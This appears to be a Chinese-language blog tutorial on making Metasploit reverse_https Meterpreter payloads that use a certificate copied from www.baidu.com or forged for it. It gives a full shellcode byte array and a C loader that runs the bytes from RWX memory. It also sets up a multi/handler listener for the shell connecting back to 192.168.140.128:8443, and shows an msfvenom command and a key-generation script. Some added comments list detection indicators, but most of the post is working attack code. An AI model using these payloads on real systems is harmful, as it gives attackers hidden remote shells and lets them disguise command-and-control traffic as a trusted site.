  • Metasploit 生成带SSL加密载荷

    1.下载证书。Impersonate_SSL模块,下载指定网站的证书。

    msf6> use auxiliary/gather/impersonate_ssl
    msf6 auxiliary(gather/impersonate_ssl) > set rhost  www.baidu.com
    msf6 auxiliary(gather/impersonate_ssl) > run
    

    得到:/root/.msf4/loot/20210629003816_default_110.242.68.4_110.242.68.4_pem_993753.pem

    2.生成带有ssl证书的shellcode代码。

    msf auxiliary(impersonate_ssl) > use payload/windows/meterpreter/reverse_https
    msf payload(reverse_https) > set STAGERVERIFYSSLCERT true
    msf payload(reverse_https) > set HANDLERSSLCERT /root/.msf4/loot/20210629003816_default_110.242.68.4_110.242.68.4_pem_993753.pem
    msf payload(reverse_https) > set LHOST 192.168.140.128
    msf payload(reverse_https) > set LPORT 8443
    msf6 payload > generate -f c -o /root/shell.c
    

    3.打开生成文件,然后加入到shellcode执行盒中。

    #include <Windows.h>
    #include <stdio.h>
    /* Asks the linker to make the whole .data section readable, writable AND
       executable. Presumably this is what the commented-out in-place call in
       main() relies on; the VirtualAlloc path below does not need it. A PE
       whose data section is W+X is unusual for legitimate software and is a
       cheap static indicator for defenders. */
    #pragma comment(linker, "/section:.data,RWE")
    
    /* Stager bytes exactly as emitted by `generate -f c` in step 2; treat as an
       opaque blob. The readable constants inside it are what a defender can
       pivot on: the User-Agent "Mozilla/5.0 (Windows NT 6.1; Trident/7.0;
       rv:11.0) like Gecko" (lines starting 4d 6f 7a ...), the "wininet"
       module name pushed as "wini" + "net\0", and the callback address
       "192.168.140.128\0" near the end, which matches the LHOST set above. */
    unsigned char buf[] = 
    "xfcxe8x8fx00x00x00x60x89xe5x31xd2x64x8bx52x30"
    "x8bx52x0cx8bx52x14x8bx72x28x0fxb7x4ax26x31xff"
    "x31xc0xacx3cx61x7cx02x2cx20xc1xcfx0dx01xc7x49"
    "x75xefx52x8bx52x10x57x8bx42x3cx01xd0x8bx40x78"
    "x85xc0x74x4cx01xd0x8bx48x18x8bx58x20x50x01xd3"
    "x85xc9x74x3cx31xffx49x8bx34x8bx01xd6x31xc0xac"
    "xc1xcfx0dx01xc7x38xe0x75xf4x03x7dxf8x3bx7dx24"
    "x75xe0x58x8bx58x24x01xd3x66x8bx0cx4bx8bx58x1c"
    "x01xd3x8bx04x8bx01xd0x89x44x24x24x5bx5bx61x59"
    "x5ax51xffxe0x58x5fx5ax8bx12xe9x80xffxffxffx5d"
    "x68x6ex65x74x00x68x77x69x6ex69x54x68x4cx77x26"
    "x07xffxd5x31xdbx53x53x53x53x53xe8x3ex00x00x00"
    "x4dx6fx7ax69x6cx6cx61x2fx35x2ex30x20x28x57x69"
    "x6ex64x6fx77x73x20x4ex54x20x36x2ex31x3bx20x54"
    "x72x69x64x65x6ex74x2fx37x2ex30x3bx20x72x76x3a"
    "x31x31x2ex30x29x20x6cx69x6bx65x20x47x65x63x6b"
    "x6fx00x68x3ax56x79xa7xffxd5x53x53x6ax03x53x53"
    "x68xfbx20x00x00xe8x6ax01x00x00x2fx72x6ax5fx79"
    "x6dx73x34x4bx4fx74x6dx72x59x61x70x67x79x37x73"
    "x50x52x41x4fx65x44x6dx76x68x35x64x4dx46x5fx32"
    "x34x6bx44x5ax6dx79x43x65x69x32x33x55x75x66x58"
    "x68x55x41x33x54x62x43x32x6ax70x5ax43x49x5fx64"
    "x47x65x32x70x54x69x5ax63x79x76x68x53x6ax5fx37"
    "x51x58x5fx73x68x33x62x67x44x36x6ax66x69x32x46"
    "x55x63x4ax65x6ax70x4dx74x56x53x51x67x6fx30x67"
    "x48x4ax46x4ax6cx36x54x52x33x78x55x6cx6fx44x70"
    "x62x36x5ax31x68x34x32x4ax37x6dx35x50x5fx54x79"
    "x67x44x4dx41x4fx71x6ex65x52x48x39x35x53x5ax4c"
    "x54x66x57x58x74x45x4ax38x75x6dx2dx4ex55x62x6f"
    "x78x66x59x58x55x34x46x76x62x48x59x35x30x6cx6b"
    "x4fx67x48x42x43x39x4ax4bx41x75x38x41x6cx37x69"
    "x39x51x76x4ex30x65x6dx37x54x70x43x5ax65x6bx4b"
    "x72x4bx4fx00x50x68x57x89x9fxc6xffxd5x89xc6x53"
    "x68x00x32xe8x84x53x53x53x57x53x56x68xebx55x2e"
    "x3bxffxd5x96x6ax0ax5fx68x80x33x00x00x89xe0x6a"
    "x04x50x6ax1fx56x68x75x46x9ex86xffxd5x53x53x53"
    "x53x56x68x2dx06x18x7bxffxd5x85xc0x75x14x68x88"
    "x13x00x00x68x44xf0x35xe0xffxd5x4fx75xcdxe8x4c"
    "x00x00x00x6ax40x68x00x10x00x00x68x00x00x40x00"
    "x53x68x58xa4x53xe5xffxd5x93x53x53x89xe7x57x68"
    "x00x20x00x00x53x56x68x12x96x89xe2xffxd5x85xc0"
    "x74xcfx8bx07x01xc3x85xc0x75xe5x58xc3x5fxe8x6b"
    "xffxffxffx31x39x32x2ex31x36x38x2ex31x34x30x2e"
    "x31x32x38x00xbbxf0xb5xa2x56x6ax00x53xffxd5";
    /* Signature used for the jump into buf: stdcall, no arguments, no return. */
    typedef void(__stdcall* CODE) ();
    
    /*
     * main: copies buf into a freshly allocated RWX region and calls into it.
     * This is the textbook allocate/copy/execute sequence, and each step is
     * observable on the defensive side: a VirtualAlloc with
     * PAGE_EXECUTE_READWRITE on private memory, a write into that region, and
     * an indirect call whose target is not backed by any module on disk
     * (memory scanners flag private RWX regions; call-stack and thread
     * start-address checks flag the unbacked target).
     * No explicit return value.
     */
    int main()
    {
        // Alternative left commented out: call buf where it sits in .data.
        // Presumably this is why the /section:.data,RWE linker pragma is set.
        //((void(*)(void))&buf)();
        PVOID pFunction = NULL;
        // Private RWX allocation sized to the blob — the single clearest
        // memory-scanner signal in this program.
        pFunction = VirtualAlloc(0, sizeof(buf), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
        // Region is now both written to and executable; no W^X transition.
        memcpy(pFunction, buf, sizeof(buf));
        // Indirect call into memory not backed by any image.
        CODE StartShell = (CODE)pFunction;
        StartShell();
    }
    

    4.建立侦听

    use exploit/multi/handler
    msf exploit(handler) > set payload windows/meterpreter/reverse_https
    msf exploit(handler) > set HANDLERSSLCERT  /root/.msf4/loot/20210629003816_default_110.242.68.4_110.242.68.4_pem_993753.pem
    msf exploit(handler) > set STAGERVERIFYSSLCERT true
    msf exploit(handler) > set LPORT 8443
    msf exploit(handler) > set LHOST 192.168.140.128
    msf exploit(handler) > run -j
    

    确保网站可以打开。

    运行后即可上线。


    如果需要自己制作证书,则可以使用脚本生成。

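    #!/bin/bash
    # Generates an RSA key pair and exports both halves as PEM and DER.
    # Input:   passphrase read from the terminal (encrypts the PEM private key)
    # Outputs: rsa_aes_private.pem (AES-256 encrypted), rsa_public.pem,
    #          rsa_private_key.der, rsa_public_key.der
    # NOTE: DER private-key output cannot carry a passphrase, so
    #       rsa_private_key.der is written in the clear; umask 077 keeps every
    #       file created here owner-readable only.
    umask 077
    clear
    # -s keeps the passphrase off the screen; the bare echo restores the newline.
    read -s -p "Password:" PASS
    echo
    if [ -z "$PASS" ]; then
        echo "Empty password; aborting." >&2
        exit 1
    fi
    # Hand the secret to openssl through the environment (env:PASS) instead of
    # pass:... so it never appears in the process argument list (ps, /proc).
    export PASS
    echo "创建AES256加密密钥..."
    # -aes256 is what actually encrypts the key; -passout alone wrote it unencrypted.
    openssl genrsa -aes256 -passout env:PASS -out rsa_aes_private.pem 2048
    echo "生成公钥..."
    openssl rsa -in rsa_aes_private.pem -passin env:PASS -pubout -out rsa_public.pem
    echo "PEM私钥转DER..."
    openssl rsa -in rsa_aes_private.pem -passin env:PASS -out rsa_private_key.der -outform der
    echo "PEM公钥转DER..."
    openssl rsa -in rsa_public.pem -out rsa_public_key.der -pubin -outform der
    unset PASS
    echo "Finish!"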
    

    1.通过openssl伪造证书

    openssl req -new -newkey rsa:4096 -days 365 -nodes -x509 -subj "/C=UK/ST=London/L=London/O=Development/CN=www.baidu.com" -keyout www.baidu.com.key -out www.baidu.com.crt
    cat www.baidu.com.key www.baidu.com.crt > www.baidu.com.pem
    rm -rf www.baidu.com.key www.baidu.com.crt
    

    2.非交互生成shellcode

    msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.140.128 LPORT=8443 PayloadUUIDTracking=true PayloadUUIDName=Whoamishell HandlerSSLCert=/root/test/www.baidu.com.pem StagerVerifySSLCert=true -f c -o /root/test.c
    

    3.启动侦听

    use exploit/multi/handler
    set payload windows/meterpreter/reverse_https
    set LHOST 192.168.140.128
    set LPORT 8443
    set HandlerSSLCert /root/test/www.baidu.com.pem
    set StagerVerifySSLCert true
    exploit -j -z
    

    许可协议: 文章中的代码均为学习时整理的笔记,博客中除去明确标注有参考文献的文章,其他文章【均为原创】作品,转载请务必【添加出处】,您添加出处是我创作的动力!
    反制措施: 《点我预览协议》
  • 原文地址:https://www.cnblogs.com/LyShark/p/14949496.html